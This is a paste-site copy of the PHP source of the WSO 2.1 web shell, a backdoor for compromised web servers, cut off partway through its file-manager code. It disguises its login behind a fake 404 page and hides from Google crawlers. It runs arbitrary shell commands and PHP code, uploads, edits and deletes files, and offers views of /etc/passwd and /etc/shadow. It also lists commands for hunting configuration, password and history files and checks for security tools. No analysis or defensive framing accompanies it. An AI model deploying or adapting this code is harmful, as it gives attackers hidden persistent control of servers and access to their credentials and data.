PasteBay.com - Free uncensored text hosting

1

<?php

2

/* WSO 2.1 (Web Shell by devilscafe.in) */

3

$auth_pass = "fbab9efee2b89cbf7d0c549cdb0ca9ba";

4

$color = "#00ff00";

5

$default_action = 'FilesMan';

6

@define('SELF_PATH', __FILE__);

7

if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {

8

    header('HTTP/1.0 404 Not Found');

9

    exit;

10

11

@session_start();

12

@error_reporting(0);

13

@ini_set('error_log',NULL);

14

@ini_set('log_errors',0);

15

@ini_set('max_execution_time',0);

16

@set_time_limit(0);

17

@set_magic_quotes_runtime(0);

18

@define('VERSION', '2.1');

19

if( get_magic_quotes_gpc() ) {

20

    function stripslashes_array($array) {

21

        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);

22

23

    $_POST = stripslashes_array($_POST);

24

25

function printLogin() {

26

?>

27

<h1>Not Found</h1>

28

<p>The requested URL was not found on this server.</p>

29

<hr>

30

<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>

31

    <style>

32

        input { margin:0;background-color:#fff;border:1px solid #fff; }

33

    </style>

34

    <center>

35

    <form method=post>

36

    <input type=password name=pass>

37

    </form></center>

38

    <?php

39

    exit;

40

41

if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))

42

    if( empty( $auth_pass ) ||

43

        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )

44

        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;

45

    else

46

        printLogin();

48

if( strtolower( substr(PHP_OS,0,3) ) == "win" )

49

    $os = 'win';

50

else

51

    $os = 'nix';

52

$safe_mode = @ini_get('safe_mode');

53

$disable_functions = @ini_get('disable_functions');

54

$home_cwd = @getcwd();

55

if( isset( $_POST['c'] ) )

56

    @chdir($_POST['c']);

57

$cwd = @getcwd();

58

if( $os == 'win') {

59

    $home_cwd = str_replace("\\", "/", $home_cwd);

60

    $cwd = str_replace("\\", "/", $cwd);

61

62

if( $cwd[strlen($cwd)-1] != '/' )

63

    $cwd .= '/';

65

if($os == 'win')

66

    $aliases = array(

67

        "List Directory" => "dir",

68

        "Find index.php in current dir" => "dir /s /w /b index.php",

69

        "Find *config*.php in current dir" => "dir /s /w /b *config*.php",

70

        "Show active connections" => "netstat -an",

71

        "Show running services" => "net start",

72

        "User accounts" => "net user",

73

        "Show computers" => "net view",

74

        "ARP Table" => "arp -a",

75

        "IP Configuration" => "ipconfig /all"

76

);

77

else

78

    $aliases = array(

79

          "List dir" => "ls -la",

80

        "list file attributes on a Linux second extended file system" => "lsattr -va",

81

          "show opened ports" => "netstat -an | grep -i listen",

82

        "Find" => "",

83

          "find all suid files" => "find / -type f -perm -04000 -ls",

84

          "find suid files in current dir" => "find . -type f -perm -04000 -ls",

85

          "find all sgid files" => "find / -type f -perm -02000 -ls",

86

          "find sgid files in current dir" => "find . -type f -perm -02000 -ls",

87

          "find config.inc.php files" => "find / -type f -name config.inc.php",

88

          "find config* files" => "find / -type f -name \"config*\"",

89

          "find config* files in current dir" => "find . -type f -name \"config*\"",

90

          "find all writable folders and files" => "find / -perm -2 -ls",

91

          "find all writable folders and files in current dir" => "find . -perm -2 -ls",

92

          "find all service.pwd files" => "find / -type f -name service.pwd",

93

          "find service.pwd files in current dir" => "find . -type f -name service.pwd",

94

          "find all .htpasswd files" => "find / -type f -name .htpasswd",

95

          "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",

96

          "find all .bash_history files" => "find / -type f -name .bash_history",

97

          "find .bash_history files in current dir" => "find . -type f -name .bash_history",

98

          "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",

99

          "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",

100

        "Locate" => "",

101

          "locate httpd.conf files" => "locate httpd.conf",

102

        "locate vhosts.conf files" => "locate vhosts.conf",

103

        "locate proftpd.conf files" => "locate proftpd.conf",

104

        "locate psybnc.conf files" => "locate psybnc.conf",

105

        "locate my.conf files" => "locate my.conf",

106

        "locate admin.php files" =>"locate admin.php",

107

        "locate cfg.php files" => "locate cfg.php",

108

        "locate conf.php files" => "locate conf.php",

109

        "locate config.dat files" => "locate config.dat",

110

        "locate config.php files" => "locate config.php",

111

        "locate config.inc files" => "locate config.inc",

112

        "locate config.inc.php" => "locate config.inc.php",

113

        "locate config.default.php files" => "locate config.default.php",

114

        "locate config* files " => "locate config",

115

        "locate .conf files"=>"locate '.conf'",

116

        "locate .pwd files" => "locate '.pwd'",

117

        "locate .sql files" => "locate '.sql'",

118

        "locate .htpasswd files" => "locate '.htpasswd'",

119

        "locate .bash_history files" => "locate '.bash_history'",

120

        "locate .mysql_history files" => "locate '.mysql_history'",

121

        "locate .fetchmailrc files" => "locate '.fetchmailrc'",

122

        "locate backup files" => "locate backup",

123

        "locate dump files" => "locate dump",

124

        "locate priv files" => "locate priv"

125

);

127

function printHeader() {

128

    if(empty($_POST['charset']))

129

        $_POST['charset'] = "UTF-8";

130

    global $color;

131

?>

132

<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found Shell V.<?=VERSION?></title>

133

<style>

134

    body {background-color:#000;color:#fff;}

135

    body,td,th    { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }

136

    span,h1,a    { color:<?=$color?> !important; }

137

    span        { font-weight: bolder; }

138

    h1            { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }

139

    div.content    { padding: 5px;margin-left:5px;}

140

    a            { text-decoration:none; }

141

    a:hover        { background:#ff0000; }

142

    .ml1        { border:1px solid #444;padding:5px;margin:0;overflow: auto; }

143

    .bigarea    { width:100%;height:250px; }

144

    input, textarea, select    { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; }

145

    form        { margin:0px; }

146

    #toolsTbl    { text-align:center; }

147

    .toolsInp    { width: 80%; }

148

    .main th    {text-align:left;}

149

    .main tr:hover{background-color:#5e5e5e;}

150

    .main td, th{vertical-align:middle;}

151

    pre            {font-family:Courier,Monospace;}

152

    #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}

153

</style>

154

<script>

155

    function set(a,c,p1,p2,p3,charset) {

156

        if(a != null)document.mf.a.value=a;

157

        if(c != null)document.mf.c.value=c;

158

        if(p1 != null)document.mf.p1.value=p1;

159

        if(p2 != null)document.mf.p2.value=p2;

160

        if(p3 != null)document.mf.p3.value=p3;

161

        if(charset != null)document.mf.charset.value=charset;

162

163

    function g(a,c,p1,p2,p3,charset) {

164

        set(a,c,p1,p2,p3,charset);

165

        document.mf.submit();

166

167

    function a(a,c,p1,p2,p3,charset) {

168

        set(a,c,p1,p2,p3,charset);

169

        var params = "ajax=true";

170

        for(i=0;i<document.mf.elements.length;i++)

171

            params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);

172

        sr('<?=$_SERVER['REQUEST_URI'];?>', params);

173

174

    function sr(url, params) {

175

        if (window.XMLHttpRequest) {

176

            req = new XMLHttpRequest();

177

            req.onreadystatechange = processReqChange;

178

            req.open("POST", url, true);

179

            req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");

180

            req.send(params);

181

182

        else if (window.ActiveXObject) {

183

            req = new ActiveXObject("Microsoft.XMLHTTP");

184

            if (req) {

185

                req.onreadystatechange = processReqChange;

186

                req.open("POST", url, true);

187

                req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");

188

                req.send(params);

189

190

191

192

    function processReqChange() {

193

        if( (req.readyState == 4) )

194

            if(req.status == 200) {

195

                //alert(req.responseText);

196

                var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");

197

                var arr=reg.exec(req.responseText);

198

                eval(arr[2].substr(0, arr[1]));

199

200

            else alert("Request error!");

201

202

</script>

203

<head><body><div style="position:absolute;width:100%;top:0;left:0;">

204

<form method=post name=mf style='display:none;'>

205

<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>

206

<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>

207

<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>

208

<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>

209

<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>

210

<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>

211

</form>

212

<?php

213

    $freeSpace = @diskfreespace($GLOBALS['cwd']);

214

    $totalSpace = @disk_total_space($GLOBALS['cwd']);

215

    $totalSpace = $totalSpace?$totalSpace:1;

216

    $release = @php_uname('r');

217

    $kernel = @php_uname('s');

218

    $millink='http://milw0rm.com/search.php?dong=';

219

    if( strpos('Linux', $kernel) !== false )

220

        $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );

221

    else

222

        $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );

223

    if(!function_exists('posix_getegid')) {

224

        $user = @get_current_user();

225

        $uid = @getmyuid();

226

        $gid = @getmygid();

227

        $group = "?";

228

    } else {

229

        $uid = @posix_getpwuid(@posix_geteuid());

230

        $gid = @posix_getgrgid(@posix_getegid());

231

        $user = $uid['name'];

232

        $uid = $uid['uid'];

233

        $group = $gid['name'];

234

        $gid = $gid['gid'];

235

236

    $cwd_links = '';

237

    $path = explode("/", $GLOBALS['cwd']);

238

    $n=count($path);

239

    for($i=0;$i<$n-1;$i++) {

240

        $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";

241

        for($j=0;$j<=$i;$j++)

242

            $cwd_links .= $path[$j].'/';

243

        $cwd_links .= "\")'>".$path[$i]."/</a>";

244

245

    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');

246

    $opt_charsets = '';

247

    foreach($charsets as $item)

248

        $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';

249

    $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');

250

    if(!empty($GLOBALS['auth_pass']))

251

    $m['Logout'] = 'Logout';

252

    $m['Self remove'] = 'SelfRemove';

253

    $menu = '';

254

    foreach($m as $k => $v)

255

        $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';

256

    $drives = "";

257

    if ($GLOBALS['os'] == 'win') {

258

        foreach( range('a','z') as $drive )

259

        if (is_dir($drive.':\\'))

260

            $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';

261

262

    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'.

263

         '<td>:<nobr>'.substr(@php_uname(), 0, 120).'  <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>:'.$drives.'</td>'.

264

         '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.

265

         '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';

266

268

function printFooter() {

269

    $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";

270

?>

271

</div>

272

<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">

273

    <tr>

274

        <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>

275

        <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>

276

    </tr>

277

    <tr>

278

        <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>

279

        <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>

280

    </tr>

281

    <tr>

283

        <td><form method='post' ENCTYPE='multipart/form-data'>

284

        <input type=hidden name=a value='FilesMAn'>

285

        <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>

286

        <input type=hidden name=p1 value='uploadFile'>

287

        <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>

288

        <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>

289

    </tr>

291

</table>

292

</div>

293

</body></html>

294

<?php

295

296

if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }

297

if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }

298

function ex($in) {

299

    $out = '';

300

    if(function_exists('exec')) {

301

        @exec($in,$out);

302

        $out = @join("\n",$out);

303

    }elseif(function_exists('passthru')) {

304

        ob_start();

305

        @passthru($in);

306

        $out = ob_get_clean();

307

    }elseif(function_exists('system')) {

308

        ob_start();

309

        @system($in);

310

        $out = ob_get_clean();

311

    }elseif(function_exists('shell_exec')) {

312

        $out = shell_exec($in);

313

    }elseif(is_resource($f = @popen($in,"r"))) {

314

        $out = "";

315

        while(!@feof($f))

316

            $out .= fread($f,1024);

317

        pclose($f);

318

319

    return $out;

320

321

function viewSize($s) {

322

    if($s >= 1073741824)

323

        return sprintf('%1.2f', $s / 1073741824 ). ' GB';

324

    elseif($s >= 1048576)

325

        return sprintf('%1.2f', $s / 1048576 ) . ' MB';

326

    elseif($s >= 1024)

327

        return sprintf('%1.2f', $s / 1024 ) . ' KB';

328

    else

329

        return $s . ' B';

330

332

function perms($p) {

333

    if (($p & 0xC000) == 0xC000)$i = 's';

334

    elseif (($p & 0xA000) == 0xA000)$i = 'l';

335

    elseif (($p & 0x8000) == 0x8000)$i = '-';

336

    elseif (($p & 0x6000) == 0x6000)$i = 'b';

337

    elseif (($p & 0x4000) == 0x4000)$i = 'd';

338

    elseif (($p & 0x2000) == 0x2000)$i = 'c';

339

    elseif (($p & 0x1000) == 0x1000)$i = 'p';

340

    else $i = 'u';

341

    $i .= (($p & 0x0100) ? 'r' : '-');

342

    $i .= (($p & 0x0080) ? 'w' : '-');

343

    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));

344

    $i .= (($p & 0x0020) ? 'r' : '-');

345

    $i .= (($p & 0x0010) ? 'w' : '-');

346

    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));

347

    $i .= (($p & 0x0004) ? 'r' : '-');

348

    $i .= (($p & 0x0002) ? 'w' : '-');

349

    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));

350

    return $i;

351

352

function viewPermsColor($f) {

353

    if (!@is_readable($f))

354

        return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';

355

    elseif (!@is_writable($f))

356

        return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';

357

    else

358

        return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';

359

360

if(!function_exists("scandir")) {

361

    function scandir($dir) {

362

        $dh  = opendir($dir);

363

        while (false !== ($filename = readdir($dh))) {

364

            $files[] = $filename;

365

366

        return $files;

367

368

369

function which($p) {

370

    $path = ex('which '.$p);

371

    if(!empty($path))

372

        return $path;

373

    return false;

374

375

function actionSecInfo() {

376

    printHeader();

377

    echo '<h1>Server security information</h1><div class=content>';

378

    function showSecParam($n, $v) {

379

        $v = trim($v);

380

        if($v) {

381

            echo '<span>'.$n.': </span>';

382

            if(strpos($v, "\n") === false)

383

                echo $v.'<br>';

384

            else

385

                echo '<pre class=ml1>'.$v.'</pre>';

386

387

389

    showSecParam('Server software', @getenv('SERVER_SOFTWARE'));

390

    showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');

391

    showSecParam('Open base dir', @ini_get('open_basedir'));

392

    showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));

393

    showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));

394

    showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');

395

    $temp=array();

396

    if(function_exists('mysql_get_client_info'))

397

        $temp[] = "MySql (".mysql_get_client_info().")";

398

    if(function_exists('mssql_connect'))

399

        $temp[] = "MSSQL";

400

    if(function_exists('pg_connect'))

401

        $temp[] = "PostgreSQL";

402

    if(function_exists('oci_connect'))

403

        $temp[] = "Oracle";

404

    showSecParam('Supported databases', implode(', ', $temp));

405

    echo '<br>';

407

    if( $GLOBALS['os'] == 'nix' ) {

408

        $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');

409

        $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');

410

        $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');

411

        showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');

412

        showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');

413

        showSecParam('OS version', @file_get_contents('/proc/version'));

414

        showSecParam('Distr name', @file_get_contents('/etc/issue.net'));

415

        if(!$GLOBALS['safe_mode']) {

416

            echo '<br>';

417

            $temp=array();

418

            foreach ($userful as $item)

419

                if(which($item)){$temp[]=$item;}

420

            showSecParam('Userful', implode(', ',$temp));

421

            $temp=array();

422

            foreach ($danger as $item)

423

                if(which($item)){$temp[]=$item;}

424

            showSecParam('Danger', implode(', ',$temp));

425

            $temp=array();

426

            foreach ($downloaders as $item)

427

                if(which($item)){$temp[]=$item;}

428

            showSecParam('Downloaders', implode(', ',$temp));

429

            echo '<br/>';

430

            showSecParam('Hosts', @file_get_contents('/etc/hosts'));

431

            showSecParam('HDD space', ex('df -h'));

432

            showSecParam('Mount options', @file_get_contents('/etc/fstab'));

433

434

    } else {

435

        showSecParam('OS Version',ex('ver'));

436

        showSecParam('Account Settings',ex('net accounts'));

437

        showSecParam('User Accounts',ex('net user'));

438

439

    echo '</div>';

440

    printFooter();

441

443

function actionPhp() {

444

    if( isset($_POST['ajax']) ) {

445

        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;

446

        ob_start();

447

        eval($_POST['p1']);

448

        $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";

449

        echo strlen($temp), "\n", $temp;

450

        exit;

451

452

    printHeader();

453

    if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {

454

        echo '<h1>PHP info</h1><div class=content>';

455

        ob_start();

456

        phpinfo();

457

        $tmp = ob_get_clean();

458

        $tmp = preg_replace('!body {.*}!msiU','',$tmp);

459

        $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);

460

        $tmp = preg_replace('!h1!msiU','h2',$tmp);

461

        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);

462

        $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);

463

        echo $tmp;

464

        echo '</div><br>';

465

466

    if(empty($_POST['ajax'])&&!empty($_POST['p1']))

467

        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;

468

        echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';

469

    echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';

470

    if(!empty($_POST['p1'])) {

471

        ob_start();

472

        eval($_POST['p1']);

473

        echo htmlspecialchars(ob_get_clean());

474

475

    echo '</pre></div>';

476

    printFooter();

477

479

function actionFilesMan() {

480

    printHeader();

481

    echo '<h1>File manager</h1><div class=content>';

482

    if(isset($_POST['p1'])) {

483

        switch($_POST['p1']) {

484

            case 'uploadFile':

485

                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))

486

                    echo "Can't upload file!";

487

                break;

488

                break;

489

            case 'mkdir':

490

                if(!@mkdir($_POST['p2']))

491

                    echo "Can't create new dir";

492

                break;

493

            case 'delete':

494

                function deleteDir($path) {

495

                    $path = (substr($path,-1)=='/') ? $path:$path.'/';

496

                    $dh  = opendir($path);

497

                    while ( ($item = readdir($dh) ) !== false) {

498

                        $item = $path.$item;

499

                        if ( (basename($item) == "..") || (basename($item) == ".") )

500

                            continue;

501

                        $type = filetype($item);

502

                        if ($type == "dir")

503

                            deleteDir($item);

504

                        else

505

                            @unlink($item);

506

507

                    closedir($dh);

508

                    rmdir($path);

509

510

                if(is_array(@$_POST['f']))

511

                    foreach($_POST['f'] as $f) {

512

                        $f = urldecode($f);

513

                        if(is_dir($f))

514

                            deleteDir($f);

515

                        else

516

                            @unlink($f);

517

518

                break;

519

            case 'paste':

520

                if($_SESSION['act'] == 'copy') {

521

                    function copy_paste($c,$s,$d){

522

                        if(is_dir($c.$s)){

523

                            mkdir($d.$s);

524

                            $h = opendir($c.$s);

525

                            while (($f = readdir($h)) !== false)

526

                                if (($f != ".") and ($f != "..")) {

527

                                    copy_paste($c.$s.'/',$f, $d.$s.'/');

528

529

                        } elseif(is_file($c.$s)) {

530

                            @copy($c.$s, $d.$s);

531

532

533

                    foreach($_SESSION['f'] as $f)

534

                        copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);

535

                } elseif($_SESSION['act'] == 'move') {

536

                    function move_paste($c,$s,$d){

537

                        if(is_dir($c.$s)){

538

                            mkdir($d.$s);

539

                            $h = opendir($c.$s);

540

                            while (($f = readdir($h)) !== false)

541

                                if (($f != ".") and ($f != "..")) {

542

                                    copy_paste($c.$s.'/',$f, $d.$s.'/');

543

544

                        } elseif(is_file($c.$s)) {

545

                            @copy($c.$s, $d.$s);

546

547

548

                    foreach($_SESSION['f'] as $f)

549

                        @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);

550

551

                unset($_SESSION['f']);

552

                break;

553

            default:

554

                if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {

555

                    $_SESSION['act'] = @$_POST['p1'];

556

                    $_SESSION['f'] = @$_POST['f'];

557

                    foreach($_SESSION['f'] as $k => $f)

558

                        $_SESSION['f'][$k] = urldecode($f);

559

                    $_SESSION['cwd'] = @$_POST['c'];

560

561

                break;

562

563

        echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';

564

565

    $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);

566

    if($dirContent === false) {    echo 'Can\'t open this folder!'; return;    }

567

    global $sort;

568

    $sort = array('name', 1);

569

    if(!empty($_POST['p1'])) {

570

        if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))

571

            $sort = array($match[1], (int)$match[2]);

572

573

?>

574

<script>

575

    function sa() {

576

        for(i=0;i<document.files.elements.length;i++)

577

            if(document.files.elements[i].type == 'checkbox')

578

                document.files.elements[i].checked = document.files.elements[0].checked;

579

580

</script>

581

<table width='100%' class='main' cellspacing='0' cellpadding='2'>

582

<form name=files method=post>

583

<?php

584

    echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";

585

    $dirs = $files = $links = array();

586

    $n = count($dirContent);

587

    for($i=0;$i<$n;$i++) {

588

        $ow = @posix_getpwuid(@fileowner($dirContent[$i]));

589

        $gr = @posix_getgrgid(@filegroup($dirContent[$i]));

590

        $tmp = array('name' => $dirContent[$i],

591

                     'path' => $GLOBALS['cwd'].$dirContent[$i],

592

                     'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),

593

                     'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),

594

                     'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),

595

                     'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),

596

                     'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])

597

);

598

        if(@is_file($GLOBALS['cwd'].$dirContent[$i]))

599

            $files[] = array_merge($tmp, array('type' => 'file'));

600

        elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))

601

            $links[] = array_merge($tmp, array('type' => 'link'));

602

        elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))

603

            $dirs[] = array_merge($tmp, array('type' => 'dir'));

604

605

    $GLOBALS['sort'] = $sort;

606

    function cmp($a, $b) {

607

        if($GLOBALS['sort'][0] != 'size')

608

            return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);

609

        else

610

            return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);

611

612

    usort($files, "cmp");

613

    usort($dirs, "cmp");

614

    usort($links, "cmp");

615

    $files = array_merge($dirs, $links, $files);

616

    $l = 0;

617

    foreach($files as $f) {

618

        echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']

619

            .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';

620

        $l = $l?0:1;

621

622

?>

623

    <tr><td colspan=7>

624

    <input type=hidden name=a value='FilesMan'>

625

    <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>

626

    <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>

627

